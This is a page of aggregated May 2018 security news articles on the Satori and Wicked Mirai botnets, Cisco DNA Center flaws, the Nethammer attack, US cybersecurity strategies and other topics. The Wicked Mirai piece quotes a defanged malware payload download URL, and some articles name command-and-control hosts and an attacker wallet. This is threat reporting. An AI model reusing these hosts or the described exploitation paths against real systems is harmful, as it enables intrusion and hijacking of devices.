English Articles -

Úvod  0  1  2  3  4  5  6  7  8  9  10  11  12  13  14  15  16  17  18  19  20  21  22  23  24  25  26  27  28  29  30  31  32  33  34  35  36  37  38  39  40  41  42  43  44  45  46  47  48  49  50 


 


Satori Botnet is targeting exposed Ethereum mining pools running the Claymore mining software
19.5.2018 securityaffairs BotNet

While a new variant of the dreaded Mirai botnet, so-called Wicked Mirai, emerged in the wild the operators of the Mirai Satori botnet appear very active.

Experts observed hackers using the Satori botnet to mass-scan the Internet for exposed Ethereum mining pools, they are scanning for devices with port 3333 exposed online.

The port 3333 is a port commonly used for remote management by a large number of cryptocurrency-mining equipment.

The activities were reported by several research teams, including Qihoo 360 Netlab, SANS ISC, and GreyNoise Intelligence.

360 Netlab
@360Netlab
Do you see port 3333 scan traffic going up? Satori botnet is scanning it now, see our Scanmon trend https://scan.netlab.360.com/#/dashboard?tsbeg=1525536000000&tsend=1526140800000&dstport=3333&toplistname=srcip&topn=10&sortby=sum …, and try a dns lookup for one of the control domain it is using now, dig any http://c.sunnyjuly.gq , I personally like yesterday's TXT result more

8:32 PM - May 11, 2018
30
19 people are talking about this
Twitter Ads info and privacy
Starting from May 11, experts are observing the spike in activity of the Satori botnet.
satori botnet activity
According to the researchers at GreyNoise, threat actors are focused on equipment running the Claymore mining software, once the attackers have found a server running this software they will push instructions to force the device to join the ‘dwarfpool’ mining pool using the ETH wallet controlled by the attackers.

GreyNoise Intelligence
@GreyNoiseIO
12 May
GreyNoise observed a large spike of TCP port 3333 scan traffic today. This is the default port for the "Claymore" dual Ethereum/Decred cryptocurrency miner. pic.twitter.com/5g6vVbPLNq

GreyNoise Intelligence
@GreyNoiseIO
Once the attacker identifies a server running the Claymore software they push instructions to reconfigure the device to join the "dwarfpool" mining pool and use the attacker's ETH wallet (https://etherscan.io/address/0xd0897da92bd7d7754f4ea18f8169dbc08beb8df7 …) pic.twitter.com/0IVo7CKsjf

12:43 AM - May 12, 2018


2
See GreyNoise Intelligence's other Tweets
Twitter Ads info and privacy
The experts noticed that most of the devices involved in the mass scanning are compromised GPON routers located in Mexico.

The experts monitored five botnets using the compromised GPON routers to scan for Claymore miners, one of them is the Satori botnet that is leveraging an exploit for the attack.

GreyNoise Intelligence
@GreyNoiseIO
12 May
Replying to @GreyNoiseIO
Effective 6:43 PM EST the attacker has only mined ~$200 worth of ETH

GreyNoise Intelligence
@GreyNoiseIO
Interestingly, 95% of the devices scanning for port 3333 today are located in the same residential ISP in Mexico (https://twitter.com/Telmex ) as the majority of the hosts affected by the GPON vulnerability disclosed earlier this week. https://twitter.com/GreyNoiseIO/status/994486111178252288 …

12:45 AM - May 12, 2018
1
See GreyNoise Intelligence's other Tweets
Twitter Ads info and privacy

GreyNoise Intelligence
@GreyNoiseIO
GreyNoise has observed ~13,000 compromised home routers probing the Internet for the '/GponForm/diag_Form' URI over the past 96 hours, likely related to the weaponization of CVE-2018-10561. Most devices are located in the "Uninet" ISP in Mexico.

Ref: https://github.com/f3d0x0/GPON

9:55 AM - May 10, 2018
20
22 people are talking about this
Twitter Ads info and privacy
Below the details of the five botnets published by Netlab 360:

Satori: Satori is the infamous variant of the mirai botnet.
We first observed this botnet coming after the GPON vulnerable devices at 2018-05-10 05:51:18, several hours before our last publish.
It has quickly overtakes muhstik as the No.1 player.
Mettle: A malicious campaign based on IP addresses in Vietnam (C2 210.245.26.180:4441, scanner 118.70.80.143) and mettle open source control module
Hajime: Hajime pushed an update which adds the GPON’s exploits
Two Mirai variants: At least two malicious branches are actively exploiting this vulnerability to propagate mirai variants. One of them has been called omni by newskysecurity team.
imgay: This appears like a botnet that is under development. Its function is not finished yet.
“In our previous article, we mentioned since this GPON Vulnerability (CVE-2018-10561, CVE-2018-10562 ) announced, there have been at least five botnets family mettle, muhstik, mirai, hajime, satori actively exploit the vulnerability to build their zombie army in just 10 days.” reads a blog post published by Netlab 360.

“From our estimate, only 2% all GPON home router is affected, most of which located in Mexico.”

“The source of this scan is about 17k independent IP addresses, mainly from Uninet SA de CV, telmex.com, located in Mexico,”

Researchers at SANS ISC that analyzed the Satori botnet activity discovered the bot is currently exploiting the CVE-2018-1000049 remote code execution flaw that affects the Nanopool Claymore Dual Miner software.

The experts observed the availability online of proof-of-concept code for the CVE-2018-1000049 vulnerability.

“The scan is consistent with a vulnerability, CVE 2018-1000049, released in February [2]. The JSON RPC remote management API does provide a function to upload “reboot.bat”, a script that can then be executed remotely. The attacker can upload and execute an arbitrary command using this feature.” reads the analysis published by the SANS ISC.

“The port the API is listening on is specified when starting the miner, but it defaults to 3333. The feature allows for a “read-only” mode by specifying a negative port, which disables the most dangerous features. There doesn’t appear to be an option to require authentication.”


"Wicked" Variant of Mirai Botnet Emerges

18.5.2018 securityweek  BotNet

A new variant of the Mirai Internet of Things (IoT) botnet has emerged, which features new exploits in its arsenal and distributing a new bot, Fortinet researchers warn.

Called Wicked, based on strings found in the code, the malware has added three new exploits compared to Mirai and appears to be the work of the same developer behind other Mirai variants.

The Mirai botnet was first spotted in the third quarter of 2016, when it fueled some of the largest distributed denial of service (DDoS) attacks at the time. The malware’s source code was leaked online in October 2016, and numerous variants have been observed ever since: Masuta, Satori, Okiru, and others.

Similar to other botnets based on Mirai, the newly discovered Wicked iteration contains three main modules: Attack, Killer, and Scanner. Unlike Mirai, however, which used brute force to gain access to vulnerable IoT devices, Wicked uses known and available exploits, many of which are already old, the security researchers discovered.

Wicked would scan ports 8080, 8443, 80, and 81 by initiating a raw socket SYN connection to the target device. Upon establishing a connection, the malware attempts to exploit the device and upload a payload to it by writing the exploit strings to the socket.

The used exploit depends on the specific port that the connection was established to. On port 8080, the malware uses Netgear DGN1000 and DGN2200 v1 router exploits (also used by Reaper botnet), on port 81 it uses a CCTV-DVR Remote Code Execution exploit, on port 8443 a Netgear R7000 and R6400 Command Injection (CVE-2016-6277), and on port 80 an invoker shell in compromised web servers.

Wicked contains the string SoraLOADER, which initially suggested it might attempt to distribute the Sora botnet. Instead, the researchers discovered that the malware would actually connect to a malicious domain to download the Owari bot, a different Mirai variant.

Although the website was confirmed to have distributed Owari, the security researchers couldn’t retrieve bot samples from the website directory. Furthermore, they discovered that the samples had been replaced by another malware family, the Omni bot.

Looking through the website’s /bins directory, the security researchers discovered other Omni samples, which were apparently delivered using the Gigabit-capable Passive Optical Network (GPON) vulnerability CVE-2018-10561.

While looking for the connections between Wicked, Sora, Owari, and Omni, the security researchers found an April interview with the developer behind Sora and Owari, who goes by the online handle of “Wicked” himself. At the time, the malware author said that Sora was abandoned, but work on Owari would continue, with no new projects planned.

Based on their findings and the malware author’s saying, Fortinet believes that both Sora and Owari bots have been abandoned, and that Omni is the current project the developer works on.

“Based on the author’s statements in the above-mentioned interview as to the different botnets being hosted in the same host, we can essentially confirm that the author of the botnets Wicked, Sora, Owari, and Omni are one and the same. This also leads us to the conclusion that while the WICKED bot was originally meant to deliver the Sora botnet, it was later repurposed to serve the author’s succeeding projects,” Fortinet concludes.


Net Neutrality: Party Politics and Consumer Concerns
18.5.2018 securityweek  BigBrothers

Net neutrality in the U.S. is a bi-partisan issue being fought in a very partisan manner. It was introduced in the Democrat Obama-years, and abandoned by the Republican Trump-installed FCC chairman Ajit Pau. Sen. Edward Markey, D-Mass. filed a procedural petition that would allow a debate on overturning the FCC ruling via the Congressional Review Act. To succeed, this would require the support of the Senate, followed by a vote in the House, and finally the agreement of the president.

The Senate voted Wednesday and the first hurdle has been overcome. The motion needed a simple majority of 51 votes. The Democrats were confident: there are 49 Democrats in the Senate -- Sen. Susan Collins, R-Maine had promised support; and Sen. John McCain, R-AZ, was forced to be absent through illness, providing a basic majority

In the event, the Senate voted by 52 to 47 to open the debate. Three Republicans joined with Democrats: Sen. Susan Collins of Maine, Sen. John Kennedy of Louisiana and Sen. Lisa Murkowski of Alaska. The debate will now go to the House of Representatives, but it is unlikely to go any further. Republicans dominate the House -- and in the unlikely event they agree to re-instate net neutrality, it will almost certainly not be accepted by President Trump.

Right now, net neutrality is, and is likely to remain, dead along purely political partisan lines. But outside of Washington it is not a partisan issue. Sen Markey points out in a twee that 82% of republicans, 90% of democrats, and 86% of all Americans support the concept of net neutrality (statistics from the Program for Public Consultation at the University of Maryland).

The issue can be characterized by universal equal and full access to the internet versus a more efficient and better managed internet. Net neutrality holds that the internet should be equally accessible by and to everyone, always. Opponents hold that some control by the communications companies, particularly the ability to set differential prices, will lead to greater investment in the internet infrastructure and better broadband. The problem with the latter argument is that the communications companies have a history of using such powers to their own benefit and the cost of others.

"Make no mistake," warns Sean McGrath, online privacy expert at BestVPN; "the abolition of net neutrality will erode the democratic fabric that binds the Internet together. It will allow internet service providers and cable companies to dictate the winners and losers in the digital world and it will give a very small number of market players near-limitless power, stifling the rights of citizens that cannot afford to play by their rules."

The fear is that ISPs will block or slow down selected services unless the user pays a premium.

Francis Dinha, CEO and co-founder of the open source VPN protocol OpenVPN, believes that many companies will be forced to re-evaluate their business models since consumers are unlikely to pay for services that have traditionally been free.

"With this in mind," he comments, "there are solutions for users to get around blocking or slowdown. Marketers can use a VPN service that supports strong encryption and good obfuscation techniques to circumvent any slowdown or blocking of any public internet service. It will be very difficult for ISPs to slow down or block a VPN service that supports advanced obfuscation techniques." Note that the VPN industry is likely to be the major non-ISP beneficiary of the end of net neutrality.

There are also specific security concerns over the demise of net neutrality. One is a potential increase in fraudulent activity. If users are forced to pay for better services, the paid accounts will more likely be shared among family and friends. Once they are shared, they are more likely to be stolen by hackers.

"Up to 25 percent of video streaming subscribers share passwords," explains Vanita Pandey, VP of strategy and product marketing at ThreatMetrix. "If the end of net neutrality results in the sluggish Netflix experiences some predict, friends and family will pass around credentials for the fastest broadband account, which will inevitably get posted online, where they'll join more than 9 billion other stolen credentials -- names, addresses, passwords, PIN codes and more -- available to fraudsters on the dark web. As it stands, wayward login credentials will cost streaming companies $650 million in lost potential revenue this year. Across all industries, cybercrime fueled by stolen identity credentials will result in global losses of $3 trillion or more."

After Wednesday's vote, net neutrality activists are jubilant. "This is a historic victory for the free and open Internet, and a major step forward for the future of free expression and democracy," announced Evan Greer, deputy director of Fight for the Future. The reality, however, is that this vote will probably have no ultimate effect on the FCC's ruling against net neutrality -- that would probably require a change in the political landscape before any legislation cements the process.

This is now a purely partisan political issue -- and the only real beneficiary of Wednesday's vote is the Democratic party. The debate now goes to the House of Representatives, where net neutrality will almost certainly be confirmed as dead. But with so much consumer support, Democrats will hope that voters will punish Republican politicians who go against their wishes in the upcoming mid-term elections.


U.S. Energy Department Unveils Multiyear Cybersecurity Plan
18.5.2018 securityweek  Cyber

The U.S. Department of Energy this week announced its strategy to reduce cyber risks in the energy sector and outlined its goals, objectives and activities for the next five years.

With the energy sector increasingly targeted by threat actors, the Energy Department is concerned that attackers may be able to cause a large and prolonged energy disruption. In an effort to improve the cybersecurity and resilience of energy services, the agency has created the DOE Multiyear Plan for Energy Sector Cybersecurity, which is meant to provide a foundation for the recently launched Office of Cybersecurity, Energy Security, and Emergency Response (CESER).US Energy Department announces multiyear plan for cybersecurity in the energy sector

The plan focuses on three main goals: strengthening cybersecurity preparedness, coordinating incident response and recovery, and accelerating research, development and demonstration (RD&D) for resilient energy delivery systems (EDS).

When it comes to strengthening preparedness, the DOE’s objectives include enhancing information sharing and situational awareness capabilities, strengthening risk management capabilities, reducing supply chain vulnerabilities, and developing and improving information sharing tools. This last objective includes the development of a virtual crowdsourced malware forensic analysis platform.

As for incident response and recovery, the Energy Department wants to establish a coordinated national incident response capability, conduct training for emergency responders and improve the incident reporting process, and conduct exercises.

The DOE’s third goal is to accelerate “game-changing RD&D” of resilient EDS, including for detecting, preventing and mitigating cyber incidents. The organization also wants tools and technologies that can anticipate future attack scenarios, and the development of systems and components that are cybersecurity-aware and capable of automatically handling cyberattacks.

“The DOE will be updating the Cybersecurity Capability Maturity Model (C2M2). The market has changed since it was published in February 2014,” commented Michael Magrath, director of global regulations & standards at VASCO Data Security. “We anticipate DOE will incorporate NIST’s Digital Identity Guidelines (SP 800-63-3), refreshed in 2017 and advance risk-based, biometric adaptive authentication technologies to protect the nation’s energy sector.”

“We welcome the DOE raising awareness around critical threats to the energy sector and laying out a strategy,” said Ray DeMeo, COO at Virsec. “While the strategy pillars are sound, making them actionable will be challenging - largely in view of the inertia behind legacy systems. It's critical that we invest with speed and agility, and the roadmap’s goal to accelerate game-changing RD&D of resilient systems stands out. The administration’s funding request for $96 million is hopefully just a down payment, because protecting our infrastructure adequately will cost billions.”


Critical Flaws in Cisco DNA Center Allow Unauthorized Access
18.5.2018 securityweek 
Vulnerebility

Cisco has found and patched three critical unauthorized access vulnerabilities in its Digital Network Architecture (DNA) platform.

Cisco DNA is a solution that helps enterprises automate network operations, making it easy to design, provision and apply policies across their environments.

Cisco discovered that the DNA Center is impacted by three serious flaws. One of them, CVE-2018-0222, is related to the existence of undocumented static credentials for the default admin account.

A remote attacker could leverage these credentials to gain access to the affected system and execute commands with root privileges. The issue has been addressed with the release of Cisco DNA Center software version 1.1.3.

The second vulnerability, CVE-2018-0271, allows a remote attacker to bypass authentication and obtain privileged access to critical services in the DNA Center. This flaw has been patched with the release of Cisco DNA Center software version 1.1.2.

“The vulnerability is due to a failure to normalize URLs prior to servicing requests. An attacker could exploit this vulnerability by submitting a crafted URL designed to exploit the issue,” Cisco explained in an advisory.

The third critical security hole in DNA Center, CVE-2018-0268, also allows a remote attacker to bypass authentication and obtain elevated privileges. A patch is included in version 1.1.3.

“This vulnerability is due to an insecure default configuration of the Kubernetes container management subsystem within DNA Center,” Cisco said. “An attacker who has the ability to access the Kubernetes service port could execute commands with elevated privileges within provisioned containers. A successful exploit could result in a complete compromise of affected containers.”

All the vulnerabilities were discovered by Cisco itself and there is no evidence of malicious exploitation.

Cisco published more than a dozen security advisories on Wednesday, including four that describe high severity vulnerabilities.

The list includes a cross-site request forgery (CSRF) flaw in IoT Field Network Director (IoT-FND), a denial-of-service (DoS) bug in the Identity Services Engine (ISE), a shell access vulnerability in Enterprise NFV Infrastructure Software (NFVIS), and a DoS problem in Meeting Server.


DHS Publishes New Cybersecurity Strategy
18.5.2018 securityweek  BigBrothers

The U.S. Department of Homeland Security (DHS) this week published its long-delayed Cybersecurity Strategy. It had been mandated by Congress to deliver a strategy by March 2017, and did so on May 15, 2018.

The strategy is defined in a high-level document (PDF) of 35 pages. Its scope is to provide "the Department with a framework to execute our cybersecurity responsibilities during the next five years to keep pace with the evolving cyber risk landscape by reducing vulnerabilities and building resilience; countering malicious actors in cyberspace; responding to incidents; and making the cyber ecosystem more secure and resilient."

This framework comprises five pillars containing seven separate goals. The pillars are risk identification; vulnerability reduction Including the twin goals of protecting federal systems and critical industries); threat reduction by proactive means; consequence mitigation (that is, improved incident response); and to enable cybersecurity outcomes. The last pillar comprises the twin goals of strengthening the security and reliability of the cyber ecosystem, and improving the management of its own activities.

"The cyber threat landscape is shifting in real-time, and we have reached a historic turning point," said DHS Secretary Kirstjen Nielsen. "Digital security is now converging with personal and physical security, and it is clear that our cyber adversaries can now threaten the very fabric of our republic itself. That is why DHS is rethinking its approach by adopting a more comprehensive cybersecurity strategy. In an age of brand-name breaches, we must think beyond the defense of specific assets -- and confront systemic risks that affect everyone from tech giants to homeowners. Our strategy outlines how DHS will leverage its unique capabilities on the digital battlefield to defend American networks and get ahead of emerging cyber threats."

Of necessity, however, the five pillars and seven goals are defined in very basic terms. They define objectives, sub-objectives and outcomes -- but with little on methods. For example, goal #1 (the risk identification pillar) is to assess evolving cybersecurity risks. This will be achieved by working with "stakeholders, including sector-specific agencies, nonfederal cybersecurity firms, and other federal and nonfederal entities, to gain an adequate understanding of the national cybersecurity risk posture, analyze evolving interdependencies and systemic risk, and assess changing techniques of malicious actors."

However, nobody was able to predict, detect or prevent Russian meddling in the 2016 presidential election, nor the WannaCry and NotPetya outbreaks. The implication is that something new and beyond just increased interagency cooperation needs to be done to achieve genuine risk identification.

The third pillar, threat reduction together with goal #4 (prevent and disrupt criminal use of cyberspace) is also interesting. The strategy states, "We will reduce cyber threats by countering transnational criminal organizations and sophisticated cyber criminals." Again, the obvious question is, 'How?'. The strategy states, "our law enforcement jurisdiction is broad". But it does not reach into those countries that are generally considered to be the prime movers of serious cyber criminality: Russia, China, Iran and North Korea.

Indeed, the U.S. government has so far failed to repatriate Edward Snowden from Russia, nor even to apprehend Julian Assange in the European Union. It is difficult to see how the DHS will be able to prevent and disrupt advanced foreign criminal use of cyberspace without resorting to new tactics -- such as a more aggressive active defense verging on hacking back. Neither 'active defense' nor 'hack back' are mentioned in the strategy document.

Ray DeMeo, COO at Virsec, has similar concerns. "Cybersecurity is an inherently global issue and it's good that the DHS strategy recognizes the need for a 'global approach with robust international engagement'," he told SecurityWeek. "But it's yet unclear how an agency with a domestic mandate is going to effectively engage globally. The reality is that a large portion of internet crime is driven from the international "wild west" from areas with lax law enforcement, or actual nation-state sponsorship. This problem is as much diplomatic as it is technological."

These caveats aside, it is good to see a formal strategy to cover the DHS' entire theater of responsibility with a clearly stated objective: "By 2023, the Department of Homeland Security will have improved national cybersecurity risk management by increasing security and resilience across government networks and critical infrastructure; decreasing illicit cyber activity; improving responses to cyber incidents; and fostering a more secure and reliable cyber ecosystem through a unified departmental approach, strong leadership, and close partnership with other federal and nonfederal entities."

"The strategy put forth by DHS is very comprehensive and well thought out," says Rishi Bhargava, co-founder at Demisto. "The inclusion of response plan coordination under the Consequence Mitigation section is a critical piece to be able to contain damage from an attack. Any strategy is as good as it's execution. I look forward to seeing this put in action across different departments and policies."

It is reassuring that the organization is not seeking to develop its own new framework, but to encourage the use of existing relevant frameworks. "DHS," says the document, "must expand efforts to encourage adoption of applicable cybersecurity best practices, including NIST's Framework for Improving Critical Infrastructure Cybersecurity."

It is a little surprising, however, that while NIST is specified, the Domain Message Authentication Reporting & Conformance (DMARC) protocol is not mentioned. In October 2017, DHS issued a binding operational directive requiring that all federal agencies start to use DMARC. By January 2018 it was reported that about half of the agencies had implemented DMARC, but only at its lowest level.

It is easy to be critical of a high-level strategy document -- it is the detail of implementation that will decide on the effectiveness of this strategy. For the moment, this document marks a valuable and important approach to unifying and strengthening the domestic cybersecurity remit of the DHS. "The DHS approach to managing cybersecurity risk on the national level," comments Brajesh Goyal, VP of engineering at Cavirin, "is a good analogy for what organizations need to do to manage their cyber-posture. A good framework for this is the NIST Cybersecurity Framework (CSF). This can serve as a foundation for other security in-depth actions."

"It's important that the DHS has finally published its cybersecurity strategy," explains DeMeo; "but by definition, this is high-level. For the most part, these are sensible recommendations. What's critical now is making this strategy actionable. One of the document's guiding principles is to foster innovation and agility -- this is a big ask, where existing time horizons must be reduced from years down to months. We need to dramatically accelerate collaboration with the private sector, where meaningful security innovation is happening daily, if we are going to change the asymmetric nature of today's threat landscape."


CISCO issued security updates to address three critical flaws in Cisco DNA Center
18.5.2018 securityaffairs
Vulnerebility

Cisco has issued security updates to address three critical vulnerabilities in its DNA Center appliance, admins need to update their installs as soon as possible.
Cisco has issued security updates to address three critical vulnerabilities in its Digital Network Architecture (DNA) Center appliance.

The DNA Center is a network management and administration tool, experts discovered three vulnerabilities that could be exploited by remote unauthenticated attackers to take over the appliance.

The most severe issue is a static credentials vulnerability (CVE-2018-0222) affecting the DNA Center, the attacker can use them to completely take over the targeted appliance.

“A vulnerability in Cisco Digital Network Architecture (DNA) Center could allow an unauthenticated, remote attacker to log in to an affected system by using an administrative account that has default, static user credentials.” reads the security advisory published by Cisco.

The experts found undocumented, static user credentials for the default administrative account in the affected software.

“The vulnerability is due to the presence of undocumented, static user credentials for the default administrative account for the affected software. An attacker could exploit this vulnerability by using the account to log in to an affected system.” continues the advisory.

“A successful exploit could allow the attacker to log in to the affected system and execute arbitrary commands with root privileges.”

The second vulnerability tracked as CVE-2018-0271 affects the API gateway of the Cisco Digital Network Architecture (DNA) Center.

The flaw could be exploited by a remote unauthenticated attacker to bypass authentication and gain a privileged access to critical services in the DNA Center.

“A vulnerability in the API gateway of the Cisco Digital Network Architecture (DNA) Center could allow an unauthenticated, remote attacker to bypass authentication and access critical services.” reads the Cisco advisory.

“The vulnerability is due to a failure to normalize URLs prior to servicing requests. An attacker could exploit this vulnerability by submitting a crafted URL designed to exploit the issue,”

The third critical flaw in DNA Center fixed by Cisco tracked as CVE-2018-0268 could be exploited by an attacker to bypass authentication within the container instances and obtain elevated privileges.

“This vulnerability is due to an insecure default configuration of the Kubernetes container management subsystem within DNA Center,” states the Cisco security advisory. “An attacker who has the ability to access the Kubernetes service port could execute commands with elevated privileges within provisioned containers. A successful exploit could result in a complete compromise of affected containers.”

Cisco rolled out a security update to DNA Center via its System Updates tool, admins need to install the version 1.1.3 as soon as possible.


Nethammer – Exploiting Rowhammer attack through network without a single attacker-controlled line of code
18.5.2018 securityaffairs
Exploit

Nethammer attack technique is the first truly remote Rowhammer attack that doesn’t require a single attacker-controlled line of code on the targeted system.
A few days ago security experts announced the first network-based remote Rowhammer attack, dubbed Throwhammer. The attack exploits a known vulnerability in DRAM through network cards using remote direct memory access (RDMA) channels.

Rowhammer is classified as a problem affecting some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows, this means that theoretically, an attacker can change any value of the bit in the memory.

The issue has been known at least since 2012, the first attack was demonstrated in 2015 by white hat hackers at Google Project Zero team.

To better understand the Rowhammer flaw, let’s remember that a DDR memory is arranged in an array of rows and columns. Blocks of memory are assigned to various services and applications. To avoid that an application accesses the memory space reserved by another application, it implements a “sandbox” protection mechanism.

Bit flipping technique caused by the Rowhammer problems could be exploited to evade the sandbox.

A separate group of security researchers has now demonstrated another network-based remote Rowhammer attack dubbed Nethammert, that leverages uncached memory or flush instruction while processing the network requests.

“Nethammer is the first truly remote Rowhammer attack, without a single attacker-controlled line of code on the targeted system. Systems that use uncached memory or flush instructions while handling network requests, e.g., for interaction with the network device, can be attacked using Nethammer” reads the research paper published by the experts.

The research team was composed of academics from the Graz University of Technology, the University of Michigan and Univ Rennes.

The Nethammer technique can be exploited by attackers to execute arbitrary code on the targeted system by rapidly writing and rewriting memory used for packet processing.

The attack is feasible only with a fast network connection between the attacker and victim.
“We demonstrate that the frequency of the cache misses is in all three cases high enough to induce bit flips. We evaluated different bit flip scenarios.” continues the paper.
“Depending on the location, the bit flip compromises either the security and integrity of the system and the data of its users, or it can leave persistent damage on the system, i.e., persistent denial of service.”

This process results in a high number of memory accesses to the same set of memory locations, which could induce disturbance errors in DRAM and causes memory corruption by unintentionally flipping the DRAM bit-value.
Nethammer attack
Data corruption resulting from the operations can be exploited by the attackers to gain control over the victim’s system.

“To mount a Rowhammer attack, memory accesses need to be directly served by the main memory. Thus, an attacker needs to make sure that the data is not stored in the cache.” continues the attacker.
“An attacker can use the unprivileged clflush instruction to invalidate the cache line or use uncached memory if available.”

The experts highlighted that caching makes the attack more difficult, so they devised some techniques to bypass the cache and direct access to the DRAM to cause the interference.

The experts successfully demonstrated three different cache bypasses for Nethammer technique:

A kernel driver that flushes (and reloads) an address whenever a packet is received.
Intel Xeon CPUs with Intel CAT for fast cache eviction
Uncached memory on an ARM-based mobile device.
The experts observed a bit flip every 350 ms demonstrating that it is possible to hammer over the network if at least two memory accesses are served from main memory, they successfully induced the interference by sending a stream of UDP packets with up to 500 Mbit/s to the target system.

The Nethammer attack technique does not require any attack code differently from the original Rowhammer attack.

Unfortunately, any attack technique based on the Rowhammer attack is not possible to mitigate with software patched, to solve the issues, it is necessary to re-design the architecture of the flawed components, meantime threat actors can start exploiting the Rowhammer technique in the wild.

Further details on the Rowhammer attack are reported in my post titled “The Rowhammer: the Evolution of a Dangerous Attack”


The new Wicked Mirai botnet leverages at least three new exploits
18.5.2018 securityaffairs BotNet

Security experts from Fortinet have spotted a new variant of the Mirai botnet dubbed ‘Wicked Mirai’, it includes new exploits and spread a new bot.
The name Wicked Mirai comes from the strings in the code, the experts discovered that this new variant includes at least three new exploits compared to the original one.

“The FortiGuard Labs team has seen an increasing number of Mirai variants, thanks to the source code being made public two years ago.” reads the analysis published by Fortinet.

“Some made significant modifications, such as adding the capability to turn infected devices into swarms of malware proxies and cryptominers. Others integrated Mirai code with multiple exploits targeting both known and unknown vulnerabilities, similar to a new variant recently discovered by FortiGuard Labs, which we now call WICKED.”

Wicked Mirai

The Mirai botnet was first spotted in 2016 by the experts at MalwareMustDie, at the time it was used to power massive DDoS attacks in the wild. The Mirai’s source code was leaked online in October 2016, since then many other variants emerged in the wild, including Satori, Masuta, and Okiru.

According to Fortinet, the author of the Wicked Mirai is the same as the other variants.

Mirai botnets are usually composed of three main modules: Attack, Killer, and Scanner. Fortinet focused its analysis on the Scanner module that is responsible for the propagation of the malware.

The original Mirai leveraged brute force attempts to compromise other IOT devices, while the WICKED Mirai uses known exploits.

The Wicked Mirai would scan ports 8080, 8443, 80, and 81 by initiating a raw socket SYN connection to IoT devices. Once it has established a connection, the bot will attempt to exploit the device and download its payload by writing the exploit strings to the socket through the write() syscall.

The experts discovered that the exploit to be used depends on the specific port the bot was able to connect to. Below the list of devices targeted by the Wicked Mirai

Port 8080: Netgear DGN1000 and DGN2200 v1 routers (also used by Reaper botnet)
Port 81: CCTV-DVR Remote Code Execution
Port 8443: Netgear R7000 and R6400 Command Injection (CVE-2016-6277)
Port 80: Invoker shell in compromised web servers
The analysis of the code revealed the presence of the string SoraLOADER, which suggested it might attempt to distribute the Sora botnet. Further investigation allowed the researchers to contradict this hypothesis and confirmed the bot would actually connect to a malicious domain to download the Owari Mirai bot.

“After a successful exploit, this bot then downloads its payload from a malicious web site, in this case, hxxp://185[.]246[.]152[.]173/exploit/owari.{extension}. This makes it obvious that it aims to download the Owari bot, another Mirai variant, instead of the previously hinted at Sora bot.” reads the analysis.

“However, at the time of analysis, the Owari bot samples could no longer be found in the website directory. In another turn of events, it turns out that they have been replaced by the samples shown below, which were later found to be the Omni bot.”

The analysis of the website’s /bins directory revealed other Omni samples, which were apparently delivered using the GPON vulnerability CVE-2018-10561.

Wicked Mirai 2.png

Searching for a link between Wicked, Sora, Owari, and Omni, the security researchers at Fortinet found a conversation with Owari/Sora IoT Botnet author dated back to April.

The vxer, who goes by the online handle of “Wicked,” that at the time said he abandoned the Sora botnet and was working on Owari one.

The conversation suggests the author abandoned both Sora and Owari bots and he is currently working on the Omni project.

“Based on the author’s statements in the above-mentioned interview as to the different botnets being hosted in the same host, we can essentially confirm that the author of the botnets Wicked, Sora, Owari, and Omni are one and the same. This also leads us to the conclusion that while the WICKED bot was originally meant to deliver the Sora botnet, it was later repurposed to serve the author’s succeeding projects,” Fortinet concludes.


Google Offers Free DDoS Protection for U.S. Political Organizations
17.5.2018 securityweek
Attack

Jigsaw, an incubator run by Google parent Alphabet, this week announced the availability of Project Shield – which offers free distributed denial of service (DDoS) protections – for the U.S. political community.

Opened in February 2016 to independent, under-resourced news sites, Project Shield helps protect free speech by fending off crippling DDoS assaults. The service, which leverages Google technology, was launched only weeks after Google Ideas became Jigsaw.

In March last year, Google and Jigsaw announced a partnership to offer Protect Your Election, tools that would help news organizations, human rights groups, and election monitoring sites fend off not only DDoS assaults, but also phishing and account takeover attempts.

This week, Jigsaw revealed that Project Shield is now available for free to “U.S. political organizations registered with the appropriate electoral authorities, including candidates, campaigns, section 527 organizations, and political action committees.”

“These organizations are critical parts of the democratic process, and they deserve the same defenses against cyber-attacks that we’ve offered to news organizations around the world,” George Conard, Product Manager, Jigsaw, says.

The free service is offered in response to an increase in the frequency and intensity of digital attacks against democratic institutions in the United States and globally. Threat actors flood computer systems and servers with traffic to silence political speech and prevent voters from accessing the information they need.

Not only is the number of DDoS attacks increasing overall, but so does the number of attacks the same target faces, recent reports have revealed. The cost of launching a DDoS attack has decreased as well: one can hire a DDoS-launching service for only $10 per hour.

DDoS attacks increasingly target political parties, campaigns, and organizations, Conard notes. The most recent example is a Tennessee county website displaying election results being disrupted earlier this month for an hour on the night of the Tennessee congressional primary elections.

“Any political organization, regardless of size or significance, is potentially at risk. It’s critical to provide support to those smaller, more vulnerable political groups that don’t have the financial or technical resources to do it themselves. Project Shield helps ensure that any eligible organization can be protected from a range of digital attacks — for free,” Conard says.

While Project Shield can protect websites against DDoS attacks, the Protect Your Election initiative can help political organizations defend against other attacks as well. The goal remains the same as when Project Shield was launched: to protect freedom of expression and access to information.

Project Shield leverages Google’s infrastructure to protect from DDoS attacks using “a reverse proxy multi-layer defense system.” Basically, requests from end users first come through the Shield, which filters malicious traffic and only allows legitimate requests to pass through.

Not only is the tool free, but it is also easy to set up and doesn’t require maintenance, to keep a website safe from DDoS attacks, Conard says.

“Protecting critical infrastructure and institutions from cyber-attacks is more important than ever. With the U.S. midterm elections approaching, it’s crucial to make sure that private information is protected and public information is accessible,” he points out.

Jigsaw is committed to working with U.S. political organizations of all sizes to ensure that every one of them, regardless of their resources, can stay safe online. In the coming months, the protections will be expanded to international political organizations as well.


Hackers Steal '$15.3 Million' From Mexico Financial System
17.5.2018 securityweek Incindent

Hackers who targeted Mexico's interbank payment system made off with more than $15 million in the past several weeks, the Bank of Mexico said Wednesday.

The amount of funds involved in the irregular activity totaled "approximately 300 million pesos ($15.3 million)," central bank governor Alejandro Diaz de Leon told reporters.

He said commercial bank customers' accounts were never in danger.

An investigation is under way, the governor said, without indicating if the suspected hackers were domestic or international.

The interbank payments system allows banks to make real-time transfers to each other.

They connect via their own computer systems or an external provider -- the point where the attacks appear to have taken place, Lorenza Martinez, director general of the corporate payments and services system at the central bank, said on Monday.

Martinez revealed that at least five attacks had occurred but, at that time, said the amount taken was still being analyzed.

After the attacks were detected, banks switched to a slower but more secure method.


IT threat evolution Q1 2018. Statistics
17.5.2018 Kaspersky  Analysis

Q1 figures
According to KSN:

Kaspersky Lab solutions blocked 796,806,112 attacks launched from online resources located in 194 countries across the globe.
